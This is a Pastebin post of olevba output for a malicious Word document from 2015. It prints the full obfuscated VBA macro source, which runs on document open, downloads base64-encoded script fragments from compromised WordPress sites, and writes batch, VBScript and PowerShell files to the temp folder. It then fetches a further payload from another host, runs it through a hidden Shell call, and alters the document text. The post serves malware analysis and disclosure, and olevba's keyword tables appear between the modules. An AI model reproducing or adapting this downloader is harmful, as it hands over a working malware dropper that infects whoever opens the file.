SHARE
TWEET

Malicious Word macro

dynamoo Jul 8th, 2015 318 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- origin~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: origin~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: origin~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Jiqjdojksasndjkbqw_Open()
  16.      
  17. End Sub
  18. Sub Xqkjdlkasjdklwlqds_Open()
  19.      
  20. End Sub
  21. Sub Auto_Open()
  22.     Ewjklasjdklasska
  23.     Kjidjandjkhqwhd
  24. End Sub
  25. Sub Ewjklasjdklasska()
  26.     ANJKDQW = "qhwkjekj2 k1hkeh12eh1 sa"
  27. End Sub
  28. Sub Xjdklqjds()
  29.     HBQUHDQ = "21kjek 21hjeh12ke"
  30. End Sub
  31.  
  32. Sub AutoOpen()
  33.     Auto_Open
  34. End Sub
  35. Sub Workbook_Open()
  36.     NJQKDBJQ = "kj2eh jk12hjek 12hjke "
  37.     Auto_Open
  38. End Sub
  39.  
  40. Sub Kjidjandjkhqwhd()
  41.  
  42.    
  43.     Dim asjiw As Integer, woweffect As Integer, jwasssssdas As Integer, asdsssssjqwdq As Integer
  44.     Dim retVal As Variant, huwe As Integer, auwd As Integer, aabbb As Integer, BLAHUWDHS As String, YYDBHWD As String
  45.     YYDBHWD = Chr(90 + 2)
  46.    
  47.    
  48.     YUGQYD = Ubqhwdhwqbd(23269) + ""
  49.     BLAHUWDHS = Chr(84) & "em" + "p"
  50.     QHDQUWH = YUGQYD
  51.     FL2 = QHDQUWH
  52.     PH2 = Module2.Goabc(BLAHUWDHS) + YYDBHWD
  53.    
  54.     woweffect = 6
  55.     jwnqdw = 1 - woweffect
  56.    
  57.    
  58.     JIQWDJQ = 12312312
  59.     JIQWDJQ = 1 + 1 + 113 + Sgn(jwnqdw)
  60.     AAAA = JIQWDJQ
  61.    
  62.  
  63.     HYWDAX = "baji dahjkhdiqdq uhst"
  64.     JWIDJIAAA = ""
  65.     HUYFEA = "jh    qjksh jkhjk hjkh djkasd"
  66.     QIWJDABB = "b"
  67.     HUYFEA = QIWJDABB + "a" + "t"
  68.     IUQJWD = "ajhdqu iydhiuh2hjg h"
  69.     PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
  70.    
  71.     huwe = NUqwdqwbdsad(1 - 300 * Sin(20))
  72.     SSS = Chr(AAAA + 2 + huwe)
  73.     VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
  74.     BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + huwe + 2) + HUYFEA
  75.    
  76.     INTG = "" & "o" & "bject"
  77.     KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "d" + "" + "ul" + "e"
  78.     AFTG = "m" & KIWD
  79.    
  80.     SXEE = Chr(46)
  81.     SXAA = Chr(101)
  82.     SXE = SXEE & SXAA & "" & "xe"
  83.     GNG = "" & ".jpg" & ""
  84.    
  85.    
  86.    
  87.     HUQD = Chr(30 + 16 + 1)
  88.     ATTH = "ht" & "t" & "" & "p" & ":" & "/" & "/"
  89.     SPIC = Chr(100 + 15) + "av" & "epi" + "c." & "s" & "u" + HUQD
  90.      
  91.     PSPTH = PH2 + PSFL
  92.     VBPTH = PH2 + VBFL
  93.     BAPTH = "hkjackjh kjh  bhjsb"
  94.     ABPTH = PH2 + BAFL
  95.     BAPTH = ABPTH
  96.    
  97.     Dim AAAAHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
  98.    
  99.     DRT = 315
  100.     BFT = 316
  101.     CFT = 317
  102.     DFT = 318
  103.     EFT = 319
  104.     Dim NUWDHUQHUQWDH As String
  105.     NUWDHUQHUQWDH = "USE" & "RPROFILE"
  106.     Dim PBIn As String, asdwq As String, MIWDWQ As String
  107.    
  108.    
  109.    
  110.     TSTS = "." + "t" + "xt"
  111.     CDDD = "6727156315273" + TSTS
  112.     LNSS = "kaka" + TSTS
  113.     STT1 = "midwestlabradoodle.com/w" + "p-content/pl" + "ugins/really-simple-captcha/"
  114.     STT2 = "artyouneed.com/w" + "p-includes/t" + "heme-compat/"
  115.  
  116.  
  117.     PBIn = ATTH + STT1 + CDDD
  118.     CONT = Module2.Jhuqwhdhsss(PBIn)
  119.      
  120.     asdwq = Rasdas(CONT)
  121.    
  122.     HQUWDAAA = "0"
  123.     If (asdwq <> "=") Then
  124.         PBIn = ATTH + STT2 + CDDD
  125.         CONT = Module2.Jhuqwhdhsss(PBIn)
  126.         asdwq = CONT
  127.         HQUWDAAA = "1"
  128.     End If
  129.    
  130.     CONT = Quqhwdbyas(asdwq)
  131.      
  132.     Dim ahuywdgqy As String
  133.      
  134.     TVT10 = Port(CONT, "t" + "ext10")
  135.     TVT20 = Port(CONT, "text20")
  136.     TVT21 = Port(CONT, "text21")
  137.     TVT30 = Port(CONT, "text30")
  138.     TVT31 = Port(CONT, "text31")
  139.     XPT1 = Port(CONT, "stext1")
  140.     XPT2 = Port(CONT, "stext2")
  141.     XPT3 = Port(CONT, "stext3")
  142.    
  143.    
  144.     WVR = Module2.Goabc(NUWDHUQHUQWDH)
  145.     hufehu1 = InStr(WVR, "sers\")
  146.    
  147.     Dim hudhw As Integer
  148.     Dim ghdAdd(1 To 3)
  149.     ghdAdd(1) = "1"
  150.     ghdAdd(2) = "0"
  151.     ghdAdd(3) = "0"
  152.    
  153.     If (hufehu1 <> 0) Then
  154.         ghdAdd(1) = "2"
  155.     Else
  156.         ghdAdd(2) = "3"
  157.     End If
  158.  
  159.  
  160.     JHWQUD = Join(ghdAdd)
  161.     hudhw = Val(JHWQUD)
  162.    
  163.     Module2.WaitFor (1)
  164.    
  165.     MIWDWQ = ATTH + STT1 + LNSS
  166.     If (HQUWDAAA = "1") Then
  167.         MIWDWQ = ATTH + STT2 + LNSS
  168.     End If
  169.    
  170.     SEXX = Module2.Jhuqwhdhsss(MIWDWQ)
  171.    
  172.     PSTB = PBIn + "123123123"
  173.     MSTAR1 = SPIC + "5751812" + GNG
  174.     MSTAR2 = SPIC + "5757956" + GNG
  175.     STAR1 = ATTH + MSTAR1
  176.     STAR2 = ATTH + MSTAR2
  177.     FFQ = "8"
  178.     FF = FFQ + SXE
  179.    
  180.      If (hudhw = 130) Then
  181.      Open BAPTH For Output As #DRT
  182.      Print #DRT, XPT1
  183.      Print #DRT, ":rtqdftqwfdhwgqf" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
  184.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
  185.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
  186.      Print #DRT, XPT2
  187.      Close #DRT
  188.      
  189.      Module2.WaitFor (1)
  190.      
  191.      Open VBPTH For Output As #BFT
  192.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
  193.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
  194.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
  195.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
  196.      Print #BFT, XPT3
  197.      Close #BFT
  198.      
  199.      BDDT.WaitFor (1)
  200.      NTH1 = Module1.GHJgwqdjqgw(retVal, BAPTH)
  201.      
  202.      End If
  203.      
  204.      
  205.      HUDQG = "';"
  206.      
  207.      
  208.      
  209.       If (hudhw = 200) Then
  210.      ZPQSKD = FL2
  211.      Open PSPTH For Output As #CFT
  212.      Print #CFT, "$ujdkwq = 'jqwdb';"
  213.      Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
  214.      Print #CFT, "$ggtt = '" + SEXX + "';"
  215.      Print #CFT, "$pths = '" + PH2 + HUDQG
  216.      
  217.      Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
  218.      Print #CFT, "$nnm = '" + FFQ + "';"
  219.      Print #CFT, TVT10
  220.      Close #CFT
  221.      
  222.      Open VBPTH For Output As #DFT
  223.      Print #DFT, TVT30
  224.      Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
  225.      Print #DFT, TVT31
  226.      Close #DFT
  227.    
  228.      Open BAPTH For Output As #EFT
  229.      Print #EFT, "@" + "ec" + "ho off"
  230.      Print #EFT, ":hqwdjkhqw"
  231.      Print #EFT, TVT20
  232.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
  233.      Print #EFT, ":nqjwkdkqwd"
  234.      Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
  235.      Print #EFT, ":qbjdhwqbdwqh"
  236.      Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
  237.      Print #EFT, TVT21
  238.      Close #EFT
  239.      Module2.WaitFor (1)
  240.      
  241.      NTH2 = Module1.GHJgwqdjqgw(retVal, BAPTH)
  242.      
  243.      End If
  244.      
  245.     JUW = Chr(47)
  246.     AKK = Chr(60)
  247.     ZKK = ">"
  248.     NTH3 = Module1.Thwqbdhjabs(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
  249.     NTH4 = Module1.Thwqbdhjabs(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
  250.     NTH5 = Module1.Thwqbdhjabs(AKK + INTG + ZKK, "", 3)
  251.     NTH6 = Module1.Thwqbdhjabs(AKK + JUW + INTG + ZKK, "", 3)
  252.     NTH7 = Module1.Thwqbdhjabs(AKK + AFTG + ZKK, "", 3)
  253.     NTH8 = Module1.Thwqbdhjabs(AKK + JUW + AFTG + ZKK, "", 3)
  254.    
  255. End Sub
  256.  
  257.  
  258. Public Function NUqwdqwbdsad(a As Integer)
  259. NUqwdqwbdsad = Sgn(a)
  260. End Function
  261.  
  262. Public Function Ubqhwdhwqbd(a As Integer)
  263. Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
  264. End Function
  265.  
  266.  
  267. Public Function Quqhwdbyas(ByVal strData As String) As String
  268.     Dim objXML As Object
  269.     Dim objNode As Object
  270.     Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
  271.     nudqwd = Log10(100)
  272.     asduiwhqdqiw = NUqwdqwbdsad(1 - nudqwd)
  273.     QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
  274.     Set objXML = CreateObject("" & QHDHUQW)
  275.     Set objNode = objXML.createElement("b6" + "4")
  276.     objNode.DataType = "bin.b" + Chr(97) + "se6" + "4"
  277.     objNode.Text = strData
  278.     WUDHA = objNode.nodeTypedValue
  279.     Quqhwdbyas = WUDHA
  280.     Set objNode = Nothing
  281.     Set objXML = Nothing
  282. End Function
  283.  
  284. Public Function Port(a, b As String)
  285. Dim krd, tent As Integer
  286. UQWD = "" & Chr(58 + 2)
  287. NDUW = "" & Chr(70 - 8)
  288. krd = InStr(1, a, UQWD + b + NDUW) + 8
  289. tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
  290. KLMN = Mid$(a, krd, tent)
  291. HUQHWDA = KLMN
  292. Port = HUQHWDA
  293. End Function
  294.  
  295. Private Static Function Rasdas(a As String)
  296. Rasdas = Right(a, 1)
  297. End Function
  298.  
  299.  
  300. Private Static Function Log10(x)
  301. BYQGDJQ = "hadkjhasdksahk hjksgdhw"
  302. Log10 = Log(x) / Log(10#)
  303. End Function
  304.  
  305.  
  306.  
  307.  
  308.  
  309.  
  310.  
  311.  
  312.  
  313.  
  314.  
  315. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  316. ANALYSIS:
  317. +------------+----------------+-----------------------------------------+
  318. | Type       | Keyword        | Description                             |
  319. +------------+----------------+-----------------------------------------+
  320. | AutoExec   | AutoOpen       | Runs when the Word document is opened   |
  321. | AutoExec   | Auto_Open      | Runs when the Excel Workbook is opened  |
  322. | AutoExec   | Workbook_Open  | Runs when the Excel Workbook is opened  |
  323. | Suspicious | CreateObject   | May create an OLE object                |
  324. | Suspicious | Open           | May open a file                         |
  325. | Suspicious | Output         | May write to a file (if combined with   |
  326. |            |                | Open)                                   |
  327. | Suspicious | Print #        | May write to a file (if combined with   |
  328. |            |                | Open)                                   |
  329. | Suspicious | Chr            | May attempt to obfuscate specific       |
  330. |            |                | strings                                 |
  331. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  332. |            |                | be used to obfuscate strings (option    |
  333. |            |                | --decode to see all)                    |
  334. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  335. |            |                | may be used to obfuscate strings        |
  336. |            |                | (option --decode to see all)            |
  337. +------------+----------------+-----------------------------------------+
  338. -------------------------------------------------------------------------------
  339. VBA MACRO Module1.bas
  340. in file: origin~1.doc - OLE stream: u'Macros/VBA/Module1'
  341. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  342.  
  343. Public Function GHJgwqdjqgw(a As Variant, b)
  344. JKDHAKSD = "qwdnmqw,mdn,mq ,mn q,wd2"
  345. a = Shell(b, 0)
  346. GHJgwqdjqgw = a
  347. End Function
  348.  
  349.  
  350. Public Function Thwqbdhjabs(dnuwhd As String, b As String, c As Integer)
  351. Dim selectedText As String
  352. Dim wwkjdasjdljslqlkjdklqjwdlkas As Range, lesleslesqjhdjqkwhdwq As Range
  353. Set wwkjdasjdljslqlkjdklqjwdlkas = ActiveDocument.Range
  354. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  355. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  356. With wwkjdasjdljslqlkjdklqjwdlkas.Find
  357. 'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  358. 'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  359. .Text = dnuwhd
  360. .MatchWholeWord = True
  361. wwkjdasjdljslqlkjdklqjwdlkas.Find.Execute
  362. wwkjdasjdljslqlkjdklqjwdlkas.Collapse direction:=wdCollapseEnd
  363. Dim wdwq As String
  364. Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
  365. Dim wdsadwq As String
  366. lesleslesqjhdjqkwhdwq.Start = wwkjdasjdljslqlkjdklqjwdlkas.End
  367. .Text = b
  368. .MatchWholeWord = True
  369. .Execute
  370. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  371. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  372. wwkjdasjdljslqlkjdklqjwdlkas.Collapse direction:=wdCollapseStart
  373. lesleslesqjhdjqkwhdwq.End = wwkjdasjdljslqlkjdklqjwdlkas.Start
  374.  
  375. If (c = 1) Then
  376.     selectedText = lesleslesqjhdjqkwhdwq.Delete
  377. End If
  378. If (c = 2) Then
  379.     lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
  380. End If
  381.  
  382. Dim hduwaa As Integer
  383. hduwaa = 1 - 423
  384.  
  385. If (c = 3) Then
  386.     With wwkjdasjdljslqlkjdklqjwdlkas.Find
  387.     .Text = a
  388.     .Replacement.Text = "" & " "
  389.     'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  390.    'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  391.    'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  392.    'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  393.    .Wrap = wdFindContinue
  394.     .Execute Replace:=wdReplaceAll
  395.     End With
  396. End If
  397.  
  398. End With
  399. End Function
  400.  
  401.  
  402.  
  403. Public Function Moloko(a, b, c)
  404. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  405. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  406. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  407. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  408. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  409. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  410. Moloko = Mid(a, b, c)
  411. ASDQFQW = "jh21eg hj12ghejg12 "
  412. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  413. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  414. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  415. QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
  416. End Function
  417.  
  418.  
  419.  
  420.  
  421.  
  422.  
  423.  
  424. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  425. ANALYSIS:
  426. +------------+---------+-----------------------------------------+
  427. | Type       | Keyword | Description                             |
  428. +------------+---------+-----------------------------------------+
  429. | Suspicious | Shell   | May run an executable file or a system  |
  430. |            |         | command                                 |
  431. +------------+---------+-----------------------------------------+
  432. -------------------------------------------------------------------------------
  433. VBA MACRO Module2.bas
  434. in file: origin~1.doc - OLE stream: u'Macros/VBA/Module2'
  435. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  436.  
  437. Public Function Goabc(sps As String)
  438. Goabc = Environ(sps)
  439. End Function
  440.  
  441. Sub WaitFor(NumOfSeconds As Long)
  442. Dim SngSec As Long
  443. SngSec = Timer + NumOfSeconds
  444. Do While Timer < SngSec
  445. DoEvents
  446. Loop
  447. End Sub
  448. Public Function Jhuqwhdhsss(a As String)
  449. Dim ygwdg As Integer, Sduhqiuwhdagshdjqgwqwg As Object
  450. Dim ggFw As String
  451. ggFw = a
  452. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  453. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  454. BQDHJQWDGWQJGS = "MSXML2." & "Ser" & "ver" & "X" & "MLH" & Chr(84) & Chr(84) & Chr(80)
  455. Set Sduhqiuwhdagshdjqgwqwg = CreateObject(BQDHJQWDGWQJGS)
  456. Sduhqiuwhdagshdjqgwqwg.Open "G" & "" & "ET", ggFw
  457. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  458. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  459. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  460. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  461. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  462. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  463. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  464. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  465. Sduhqiuwhdagshdjqgwqwg.Send ("")
  466. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  467. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  468. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  469. HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
  470. Jhuqwhdhsss = Sduhqiuwhdagshdjqgwqwg.responsetext
  471. End Function
  472.  
  473.  
  474.  
  475.  
  476.  
  477.  
  478.  
  479.  
  480.  
  481.  
  482. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  483. ANALYSIS:
  484. +------------+--------------+-----------------------------------------+
  485. | Type       | Keyword      | Description                             |
  486. +------------+--------------+-----------------------------------------+
  487. | Suspicious | CreateObject | May create an OLE object                |
  488. | Suspicious | Open         | May open a file                         |
  489. | Suspicious | Environ      | May read system environment variables   |
  490. | Suspicious | Chr          | May attempt to obfuscate specific       |
  491. |            |              | strings                                 |
  492. +------------+--------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top